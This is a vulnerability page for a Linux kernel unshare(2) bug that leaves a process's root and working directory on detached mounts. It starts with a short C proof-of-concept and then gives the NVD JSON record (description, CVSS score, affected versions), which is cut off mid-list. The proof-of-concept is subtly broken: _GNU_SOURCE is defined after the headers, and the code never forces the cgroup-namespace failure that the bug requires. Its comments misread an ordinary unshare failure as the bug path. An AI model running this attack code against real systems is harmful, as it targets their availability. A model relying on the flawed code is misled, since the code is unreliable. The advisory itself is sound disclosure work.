CVE-2026-43472

#include <sched.h> #include <stdio.h> #include <unistd.h> #include <errno.h> #define _GNU_SOURCE /* * PoC for CVE-2026-43472 * This program attempts to trigger the vulnerable code path in unshare(2). * It uses CLONE_NEWNS and CLONE_NEWCGROUP. To trigger the bug, * copy_cgroup_ns() needs to fail after copy_mnt_ns() succeeds. * In a real scenario, this might require resource exhaustion conditions. */ int main() { printf("[+] Attempting to trigger CVE-2026-43472...\n"); // CLONE_NEWNS | CLONE_NEWCGROUP int ret = unshare(CLONE_NEWNS | CLONE_NEWCGROUP); if (ret == 0) { printf("[+] unshare succeeded. If kernel is vulnerable and conditions met, fs state might be corrupted.\n"); } else { perror("[-] unshare failed"); // Failure is expected to trigger the specific bug path (clean up logic) printf("[!] unshare failed with error. Check kernel logs for instability.\n"); } // Access filesystem to check if we are on a detached mount char cwd[1024]; if (getcwd(cwd, sizeof(cwd)) != NULL) { printf("[+] Current directory: %s\n", cwd); } return 0; }

{"cve": {"id": "CVE-2026-43472", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-08T15:17:00.313", "lastModified": "2026-05-21T14:59:05.957", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nunshare: fix unshare_fs() handling\n\nThere's an unpleasant corner case in unshare(2), when we have a\nCLONE_NEWNS in flags and current->fs hadn't been shared at all; in that\ncase copy_mnt_ns() gets passed current->fs instead of a private copy,\nwhich causes interesting warts in proof of correctness]\n\n> I guess if private means fs->users == 1, the condition could still be true.\n\nUnfortunately, it's worse than just a convoluted proof of correctness.\nConsider the case when we have CLONE_NEWCGROUP in addition to CLONE_NEWNS\n(and current->fs->users == 1).\n\nWe pass current->fs to copy_mnt_ns(), all right. Suppose it succeeds and\nflips current->fs->{pwd,root} to corresponding locations in the new namespace.\nNow we proceed to copy_cgroup_ns(), which fails (e.g. with -ENOMEM).\nWe call put_mnt_ns() on the namespace created by copy_mnt_ns(), it's\ndestroyed and its mount tree is dissolved, but... current->fs->root and\ncurrent->fs->pwd are both left pointing to now detached mounts.\n\nThey are pinning those, so it's not a UAF, but it leaves the calling\nprocess with unshare(2) failing with -ENOMEM _and_ leaving it with\npwd and root on detached isolated mounts. The last part is clearly a bug.\n\nThere is other fun related to that mess (races with pivot_root(), including\nthe one between pivot_root() and fork(), of all things), but this one\nis easy to isolate and fix - treat CLONE_NEWNS as \"allocate a new\nfs_struct even if it hadn't been shared in the first place\". Sure, we could\ngo for something like \"if both CLONE_NEWNS *and* one of the things that might\nend up failing after copy_mnt_ns() call in create_new_namespaces() are set,\nforce allocation of new fs_struct\", but let's keep it simple - the cost\nof copy_fs_struct() is trivial.\n\nAnother benefit is that copy_mnt_ns() with CLONE_NEWNS *always* gets\na freshly allocated fs_struct, yet to be attached to anything. That\nseriously simplifies the analysis...\n\nFWIW, that bug had been there since the introduction of unshare(2) ;-/"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-908"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.16.1", "versionEndExcluding": "5.10.253", "matchCriteriaId": "C527DFD3-87E2-45E8-8722-B18DC25946EE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.203", "matchCriteriaId": "20DDB3E9-AABF-4107-ADB0-5362AA067045"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.167", "matchCriteriaId": "2EDC6BAF-B710-4E26-B6AA-D68922EE7B43"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.130", "matchCriteriaId": "C57BB918-DF28-46B3-94F7-144176841267"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.78", "matchCriteriaId": "28D591F5-B196-4CC9-905C-DC80F116E7A8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.19", "matchCriteriaId": "D394AC60-6F28-435F-872A-CCDF384B8331"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.9", "matchCriteriaId": "E825E7C3-FEAC-4FD3-8A81-78D7387948C9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.16:-:*:*:*:*:*:*", "matchCriteriaId": "EBF2513D-8F4F-4ED5-ADCE-9933F34F1BFB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.16:rc3:*:*:*:*:*:*", "matchCriteriaId": "54393D69-B368-4296-9798-D81570495C6C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.16:rc4:*:*:*:*:*:*", "matchCriteriaId": "6791A801-9E06-47DD-912F-D8594E2F6B3F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:l ... (truncated)